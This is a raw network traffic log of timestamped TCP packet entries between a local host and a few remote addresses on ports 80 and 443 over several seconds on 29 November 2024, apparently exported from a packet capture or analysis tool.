                                                                                                                                                                                    Nov 29, 2024 19:49:38.965835094 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.965847015 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.965886116 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.965964079 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.966123104 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.966495037 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.966597080 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.966609001 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.966662884 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.966685057 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.966732979 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.967272997 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.967380047 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.967397928 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.967421055 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.967511892 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.967550993 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.968195915 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.968218088 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.968229055 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.968270063 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.968322992 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.968365908 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.968822956 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.968918085 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.968929052 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.968952894 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.969012976 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.969052076 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.969595909 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.969676971 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.969687939 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.969757080 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.969811916 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.969854116 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.970396042 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.970452070 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.970463991 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.970496893 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.970561028 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.970609903 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.971299887 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.971390009 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.971402884 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.971448898 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.971496105 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.971539021 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.972121954 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.018131971 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:39.153120041 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.153143883 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.153160095 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.153175116 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.153191090 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:39.153211117 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:39.153233051 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.153330088 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.153346062 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.153433084 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:39.153445005 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.153568983 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:39.154119015 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.154181004 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.154197931 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.154212952 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.154236078 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:39.154269934 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:39.154824972 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.154864073 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.154880047 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.154922009 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:39.154983997 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.155025959 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:39.155610085 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.155648947 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.155667067 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.155690908 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:39.155790091 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.155869961 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:39.156392097 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.156462908 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.156481981 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.156506062 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:39.205646038 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:39.325721025 CET4434976513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.325790882 CET4434976513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.325866938 CET49765443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:39.326158047 CET49765443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:39.326173067 CET4434976513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.330157042 CET49770443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:39.330195904 CET4434977013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.330354929 CET49770443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:39.330501080 CET49770443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:39.330517054 CET4434977013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.765376091 CET4434976613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.765917063 CET49766443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:39.765935898 CET4434976613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.766371012 CET49766443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:39.766377926 CET4434976613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.899220943 CET4434976713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.899960995 CET49767443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:39.899974108 CET4434976713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.900401115 CET49767443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:39.900407076 CET4434976713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.967459917 CET4434976813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.970432997 CET49768443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:39.970453024 CET4434976813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:39.970909119 CET49768443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:39.970913887 CET4434976813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:40.226566076 CET4434976613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:40.226634026 CET4434976613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:40.226722002 CET49766443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:40.227042913 CET49766443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:40.227042913 CET49766443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:40.227063894 CET4434976613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:40.227073908 CET4434976613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:40.229598045 CET49771443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:40.229630947 CET4434977113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:40.229723930 CET49771443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:40.229852915 CET49771443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:40.229865074 CET4434977113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:40.338653088 CET4434976713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:40.338728905 CET4434976713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:40.338783026 CET49767443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:40.404237986 CET49767443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:40.404256105 CET4434976713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:40.404268026 CET49767443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:40.404274940 CET4434976713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:40.411633015 CET4434976813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:40.411699057 CET4434976813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:40.411760092 CET49768443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:40.413460016 CET49772443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:40.413547993 CET4434977213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:40.413625002 CET49772443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:40.414202929 CET49768443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:40.414222002 CET4434976813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:40.414537907 CET49772443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:40.414551020 CET4434977213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:40.428221941 CET49773443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:40.428263903 CET4434977313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:40.428317070 CET49773443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:40.430305958 CET49773443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:40.430320024 CET4434977313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:40.748338938 CET49774443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:49:40.748373032 CET4434977420.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:40.748440981 CET49774443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:49:40.749026060 CET49774443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:49:40.749039888 CET4434977420.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:41.118155003 CET4434977013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:41.118802071 CET49770443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:41.118822098 CET4434977013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:41.119343996 CET49770443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:41.119349957 CET4434977013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:41.562390089 CET4434977013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:41.562465906 CET4434977013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:41.562746048 CET49770443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:41.562746048 CET49770443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:41.562746048 CET49770443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:41.565310955 CET49775443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:41.565345049 CET4434977513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:41.565412998 CET49775443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:41.565587044 CET49775443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:41.565602064 CET4434977513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:41.783746958 CET49770443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:41.783770084 CET4434977013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:42.009644985 CET4434977113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:42.013561964 CET49771443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:42.013588905 CET4434977113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:42.014122009 CET49771443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:42.014127970 CET4434977113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:42.147568941 CET4434977313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:42.151889086 CET49773443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:42.151905060 CET4434977313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:42.152345896 CET49773443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:42.152352095 CET4434977313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:42.195307970 CET4434977213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:42.195664883 CET49772443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:42.195683956 CET4434977213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:42.196084023 CET49772443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:42.196088076 CET4434977213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:42.453958035 CET4434977113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:42.454039097 CET4434977113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:42.454097033 CET49771443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:42.461030006 CET49771443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:42.461044073 CET4434977113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:42.461057901 CET49771443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:42.461070061 CET4434977113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:42.505976915 CET49776443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:42.505996943 CET4434977613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:42.506058931 CET49776443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:42.506927013 CET49776443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:42.506939888 CET4434977613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:42.582998991 CET4434977313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:42.583074093 CET4434977313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:42.583137035 CET49773443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:42.583225012 CET49773443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:42.583240986 CET4434977313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:42.583254099 CET49773443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:42.583259106 CET4434977313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:42.585412979 CET49777443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:42.585454941 CET4434977713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:42.585515976 CET49777443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:42.585658073 CET49777443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:42.585671902 CET4434977713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:42.640264988 CET4434977213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:42.640357018 CET4434977213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:42.640413046 CET49772443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:42.640544891 CET49772443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:42.640561104 CET4434977213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:42.640568972 CET49772443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:42.640573978 CET4434977213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:42.642899036 CET49778443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:42.642918110 CET4434977813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:42.642992973 CET49778443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:42.643150091 CET49778443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:42.643161058 CET4434977813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:43.017705917 CET4434977420.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:43.017793894 CET49774443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:49:43.021579981 CET49774443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:49:43.021590948 CET4434977420.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:43.021825075 CET4434977420.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:43.028506041 CET49774443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:49:43.028564930 CET49774443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:49:43.028569937 CET4434977420.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:43.028723001 CET49774443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:49:43.071331978 CET4434977420.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:43.413502932 CET4434977513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:43.413969994 CET49775443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:43.413999081 CET4434977513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:43.414416075 CET49775443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:43.414422035 CET4434977513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:43.699465036 CET4434977420.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:43.699562073 CET4434977420.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:43.699774981 CET49774443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:49:43.699990988 CET49774443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:49:43.700004101 CET4434977420.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:43.867295980 CET4434977513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:43.867374897 CET4434977513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:43.867438078 CET49775443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:43.867662907 CET49775443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:43.867674112 CET4434977513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:43.867686033 CET49775443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:43.867691040 CET4434977513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:43.951066971 CET49779443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:43.951096058 CET4434977913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:43.951162100 CET49779443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:43.951318026 CET49779443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:43.951328039 CET4434977913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:44.289222956 CET4434977613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:44.300023079 CET49776443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:44.300051928 CET4434977613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:44.300643921 CET49776443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:44.300662994 CET4434977613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:44.369838953 CET4434977713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:44.424357891 CET49777443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:44.425915956 CET4434977813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:44.471241951 CET49778443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:44.494818926 CET49777443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:44.494827032 CET4434977713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:44.495938063 CET49777443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:44.495944023 CET4434977713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:44.552437067 CET49778443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:44.552448034 CET4434977813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:44.553087950 CET49778443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:44.553092957 CET4434977813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:44.735408068 CET4434977613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:44.735476017 CET4434977613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:44.735544920 CET49776443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:44.806431055 CET49776443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:44.806447983 CET4434977613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:44.806459904 CET49776443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:44.806467056 CET4434977613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:44.822398901 CET4434977713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:44.822454929 CET4434977713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:44.822545052 CET49777443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:44.880100012 CET4434977813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:44.880175114 CET4434977813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:44.880502939 CET49778443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:44.904498100 CET49777443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:44.904510021 CET4434977713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:44.946839094 CET49778443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:44.946846008 CET4434977813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:45.337176085 CET49780443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:45.337204933 CET4434978013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:45.337328911 CET49780443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:45.359301090 CET49780443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:45.359318018 CET4434978013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:45.394484043 CET49781443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:45.394535065 CET4434978113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:45.394789934 CET49781443192.168.2.613.107.246.63
